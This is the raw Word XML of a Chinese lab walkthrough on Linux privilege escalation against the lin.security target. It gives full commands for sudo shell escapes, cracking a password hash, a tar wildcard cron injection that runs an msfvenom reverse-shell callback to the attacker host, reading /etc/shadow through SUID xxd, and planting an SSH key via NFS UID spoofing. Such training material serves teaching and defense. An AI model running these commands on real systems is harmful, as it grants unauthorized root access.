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免责声明： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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希望同学们知法、懂法、守法，做一个良好公民。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default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linux提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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靶场介绍：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lin.security是一个基于Ubuntu（18.04 LTS）的Linux靶场，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>含有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>许多权限提升的漏洞。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攻击机kali：root/123456</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bob / secret</w:t>
      </w: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</w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>低权限用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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一、nmap扫描，收集端口信息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nmap -sS 117.80.88.123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5823585" cy="2350135"/>
            <wp:effectExtent l="0" t="0" r="13335" b="12065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35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二、发现22号端口，使用ssh登录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ssh bob@117.80.88.123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5820410" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="1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三、sudo提权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sudo权限是root把本来只能超级用户执行的命令赋予普通用户执行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使用sudo -l这个命令来查看支持root权限的命令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sudo -l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087110" cy="1611630"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="13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发现有ash、awk、find等权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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在线查询sudo的提权命令： https://gtfobins.github.io/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2350770"/>
            <wp:effectExtent l="0" t="0" r="3810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outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>① ash提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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1049655"/>
            <wp:effectExtent l="0" t="0" r="1397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sudo ash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4145280" cy="10363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② awk提权</w:t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sudo awk 'BEGIN {system("/bin/sh")}'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143625" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="13335" b="7620"/>
            <wp:docPr id="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6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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>③ find提权</w:t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sudo find . -exec /bin/sh \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4724400" cy="7315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④ man提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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输入 sudo man man，再输入 !/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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068695" cy="4316095"/>
            <wp:effectExtent l="0" t="0" r="12065" b="12065"/>
            <wp:docPr id="16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 descr="IMG_26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431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4381500" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="10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IMG_26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⑤ socat提权</w:t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sudo socat stdin exec:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4701540" cy="891540"/>
            <wp:effectExtent l="0" t="0" r="762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四、/etc/passwd哈希提权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linux的用户密码哈希存储在/etc/shadow文件，普通用户能够查看到的则是/etc/passwd这个文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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在/etc/passwd中，账户的第二列是密码哈希，如果该列为x则代表密码哈希存储在/etc/shadow文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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读取/etc/passwd文件，发现insecurity用户的gid和uid都是0 ，即拥有root权限。且显示了密码的哈希，能进行解密。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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cat /etc/passwd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AzER3pBZh6WZE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5400675" cy="3078480"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7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 descr="IMG_26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在 https://www.somd5.com/ 进行md5解密，得到密码为 P@ssw0rd!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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5364480" cy="2486660"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="8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IMG_26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切换用户，提权成功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4514850" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620"/>
            <wp:docPr id="2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IMG_26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五、定时任务+通配符提权</w:t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先查看 /etc/crontab 有哪些定时任务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cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/etc/crontab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008370" cy="2403475"/>
            <wp:effectExtent l="0" t="0" r="11430" b="4445"/>
            <wp:docPr id="3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3" descr="IMG_26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240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从左到右以此为分，时，日，月，周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最后一条任务含义：以root用户的权限每分钟执行一次 /etc/cron.daily/backup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查看/etc/cron.daily/backup文件：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cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/etc/cron.daily/backup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257925" cy="632460"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="4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 descr="IMG_26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该脚本的含义是：使用了tar命令对/home下每个目录进行备份，且使用了通配符*，可以使用通配符提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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在kali上生成nc反弹shell的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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msfvenom -p cmd/unix/reverse_netcat lhost=117.80.88.151 lport=9999 R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249035" cy="930275"/>
            <wp:effectExtent l="0" t="0" r="14605" b="14605"/>
            <wp:docPr id="5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5" descr="IMG_27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9035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② 在靶机上将payload写入shell.sh，并赋予执行权限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218555" cy="997585"/>
            <wp:effectExtent l="0" t="0" r="14605" b="8255"/>
            <wp:docPr id="1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6" descr="IMG_27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8555" cy="99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 再创建两个文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">checkpoint-action=exec=sh shell.sh 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>checkpoint=1，两个文件的文件名会当做命令行参数给tar程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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echo &gt;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--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>checkpoint-action=exec=sh shell.sh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 xml:space="preserve">   #在checkpoint（检查点）上执行动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exec=sh shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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echo &gt;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--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>checkpoint=1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 xml:space="preserve">   #--checkpoint=n：每写入n个记录之后设置一个检查点，在检查点可以执行任意的操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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当执行tar 命令时，通配符* 会自动被替换成参数，完整命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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tar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh shell.sh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141720" cy="948055"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="20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 descr="IMG_27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94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④ 开启监听，收到反弹shell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149975" cy="2246630"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="27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 descr="IMG_27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224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六、敏感隐藏文件提权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使用find查找home目录下的所有隐藏文件，并用ls -al显示出来。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find / -name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</w:rPr>
        <w:t>.*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</w:rPr>
        <w:t xml:space="preserve"> -type f -path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</w:rPr>
        <w:t>/home/*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</w:rPr>
        <w:t xml:space="preserve"> -exec ls -al {} \; 2&gt;/dev/null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003925" cy="2096770"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="28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 descr="IMG_27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发现susan用户有一个.secret 的文件，查看文件内容得到密码，并成功切换用户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096635" cy="1750060"/>
            <wp:effectExtent l="0" t="0" r="14605" b="2540"/>
            <wp:docPr id="25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 descr="IMG_27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175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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>七、SUID提权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SUID的s指的是特殊权限，超级管理员希望用户在执行一些特殊权限文件时，拥有root的权限，就会配置特殊权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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查找 suid权限文件的命令：</w:t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find / -perm -u=s -type f -exec ls -al {} \; 2&gt;/dev/null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032500" cy="3557905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="22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IMG_27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 xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xxd提权</w:t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xxd命令可以为给定的标准输入或者文件做一次十六进制的输出，它也可以将十六进制输出转换为原来的二进制格式。并且用户组为itservices是拥有执行权限x的，当suid和执行权限一起使用将会造成提权。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cat /etc/group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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2636520" cy="54102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susan这个用户属于itservices这个用户组，可以进行提权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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68595" cy="1784350"/>
            <wp:effectExtent l="0" t="0" r="4445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xxd "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" | xxd -r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014085" cy="948055"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12065"/>
            <wp:docPr id="31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 descr="IMG_27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94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顺利的读出来只有root才能读出的shadow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这里可以尝试爆破密码，得到root权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>taskset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t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035040" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="24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 descr="IMG_27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其他用户拥有执行权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1679575"/>
            <wp:effectExtent l="0" t="0" r="0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taskset 1 /bin/sh -p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="840105"/>
            <wp:effectExtent l="0" t="0" r="14605" b="133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八、NFS提权</w:t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查看可以访问的 nfs 目录，发现账号peter的家目录可以被挂载。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showmount -e 117.80.88.123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3505200" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="18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5" descr="IMG_28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挂载peter的家目录，显示的文件的所有者和所属组分别为1001和1005</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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mkdir /mnt/peter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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mount 117.80.88.123:/home/peter /mnt/peter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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ls -al /mnt/peter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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df -h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138545" cy="5384165"/>
            <wp:effectExtent l="0" t="0" r="3175" b="10795"/>
            <wp:docPr id="32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 descr="IMG_28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538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此时是没有写入权限的，因为默认情况下客户端的root身份会被主动压缩成匿名者。</w:t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这里需要伪造文件所有者的UID和GID来欺骗NFS服务器，创建一个gid为1005的用户组，接着创建peter这个账户uid指定为1001，gid指定为1005。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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groupadd -g 1005 peter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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adduser peter -uid 1001 -gid 1005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155690" cy="5693410"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="23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7" descr="IMG_28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569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此时就有写的权限了，可以写入ssh公钥，通过密钥登陆靶机peter这个账户。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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① 生成公私钥对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ssh-keygen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005830" cy="4897120"/>
            <wp:effectExtent l="0" t="0" r="13970" b="10160"/>
            <wp:docPr id="17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8" descr="IMG_28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5830" cy="489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 创建.ssh目录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mkdir .ssh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5989955" cy="3503295"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1905"/>
            <wp:docPr id="19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9" descr="IMG_28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350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③ 将生成的公钥文件复制到peter的家目录的.ssh目录下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cat ~/.ssh/id_rsa.pub &gt; /mnt/peter/.ssh/authorized_keys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5996940" cy="2397125"/>
            <wp:effectExtent l="0" t="0" r="7620" b="10795"/>
            <wp:docPr id="30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8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 使用私钥进行登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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ssh -i id_rsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>peter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>17.80.88.123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1990725"/>
            <wp:effectExtent l="0" t="0" r="63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⑤ 通过strace可以提权到root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1075055"/>
            <wp:effectExtent l="0" t="0" r="381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sudo strace -o /dev/null /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi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6053455" cy="1718310"/>
            <wp:effectExtent l="0" t="0" r="12065" b="3810"/>
            <wp:docPr id="26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2" descr="IMG_28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171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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr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D2D6C5D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6D2D6C5D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cwMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="010435A8"/>
    <w:rsid w:val="0411346B"/>
    <w:rsid w:val="04745EB1"/>
    <w:rsid w:val="05635319"/>
    <w:rsid w:val="09793B73"/>
    <w:rsid w:val="098047A9"/>
    <w:rsid w:val="09C7321B"/>
    <w:rsid w:val="0C822BB5"/>
    <w:rsid w:val="0CD50A5F"/>
    <w:rsid w:val="0FC55A86"/>
    <w:rsid w:val="114A0E7B"/>
    <w:rsid w:val="11570F29"/>
    <w:rsid w:val="1221241B"/>
    <w:rsid w:val="127E28E2"/>
    <w:rsid w:val="12CE1E35"/>
    <w:rsid w:val="13A55A1C"/>
    <w:rsid w:val="13D440B7"/>
    <w:rsid w:val="150F7126"/>
    <w:rsid w:val="15460DEA"/>
    <w:rsid w:val="167C0D2B"/>
    <w:rsid w:val="1697343C"/>
    <w:rsid w:val="193D7C76"/>
    <w:rsid w:val="1AA40EE6"/>
    <w:rsid w:val="1BB51EC1"/>
    <w:rsid w:val="1F890B7E"/>
    <w:rsid w:val="1F9749F8"/>
    <w:rsid w:val="1FA27791"/>
    <w:rsid w:val="209669C5"/>
    <w:rsid w:val="23DC40A3"/>
    <w:rsid w:val="24327D07"/>
    <w:rsid w:val="24C83C46"/>
    <w:rsid w:val="24D63974"/>
    <w:rsid w:val="2AA66B98"/>
    <w:rsid w:val="2D185BC2"/>
    <w:rsid w:val="2F906DAB"/>
    <w:rsid w:val="2FDD7BBA"/>
    <w:rsid w:val="2FDE0572"/>
    <w:rsid w:val="2FE74788"/>
    <w:rsid w:val="2FF8610C"/>
    <w:rsid w:val="304D32BE"/>
    <w:rsid w:val="30A03AB3"/>
    <w:rsid w:val="31AE191D"/>
    <w:rsid w:val="31EE3E4C"/>
    <w:rsid w:val="32B37CAB"/>
    <w:rsid w:val="32BB68B9"/>
    <w:rsid w:val="373A6B99"/>
    <w:rsid w:val="3AD538EB"/>
    <w:rsid w:val="3D504CF4"/>
    <w:rsid w:val="41580865"/>
    <w:rsid w:val="43FF3554"/>
    <w:rsid w:val="45D773FA"/>
    <w:rsid w:val="467806FB"/>
    <w:rsid w:val="4CC1510F"/>
    <w:rsid w:val="4CED2167"/>
    <w:rsid w:val="4CF32097"/>
    <w:rsid w:val="4EBF0626"/>
    <w:rsid w:val="51021475"/>
    <w:rsid w:val="51894076"/>
    <w:rsid w:val="53A414A2"/>
    <w:rsid w:val="53D438C9"/>
    <w:rsid w:val="54401152"/>
    <w:rsid w:val="545A4CDB"/>
    <w:rsid w:val="55EC4969"/>
    <w:rsid w:val="58B30533"/>
    <w:rsid w:val="5C816D6B"/>
    <w:rsid w:val="5CCC52A0"/>
    <w:rsid w:val="5D7B5F87"/>
    <w:rsid w:val="5DF97B7F"/>
    <w:rsid w:val="608F6263"/>
    <w:rsid w:val="623B0DD0"/>
    <w:rsid w:val="62930806"/>
    <w:rsid w:val="634E3149"/>
    <w:rsid w:val="63D074B3"/>
    <w:rsid w:val="63E421C2"/>
    <w:rsid w:val="6635628F"/>
    <w:rsid w:val="6A986D85"/>
    <w:rsid w:val="6BDA6675"/>
    <w:rsid w:val="6C1E16E9"/>
    <w:rsid w:val="6EB47D3A"/>
    <w:rsid w:val="6EB72172"/>
    <w:rsid w:val="756E3325"/>
    <w:rsid w:val="76305A1C"/>
    <w:rsid w:val="76961CD3"/>
    <w:rsid w:val="77412895"/>
    <w:rsid w:val="79B06CD4"/>
    <w:rsid w:val="7ABC2DEA"/>
    <w:rsid w:val="7DEA3E2D"/>
    <w:rsid w:val="7EE540FF"/>
    <w:rsid w:val="7F0D0245"/>
    <w:rsid w:val="7F58436E"/>
    <w:rsid w:val="7FFD4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Emphasis"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="0"/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2023-09-21T06:13:22Z</dcterms:created>
  <dc:creator>X</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-21T09:42:22Z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4F64CD81384A438E859B2E84C2553F51_12</vt:lpwstr>
  </property>
</Properties>
</file>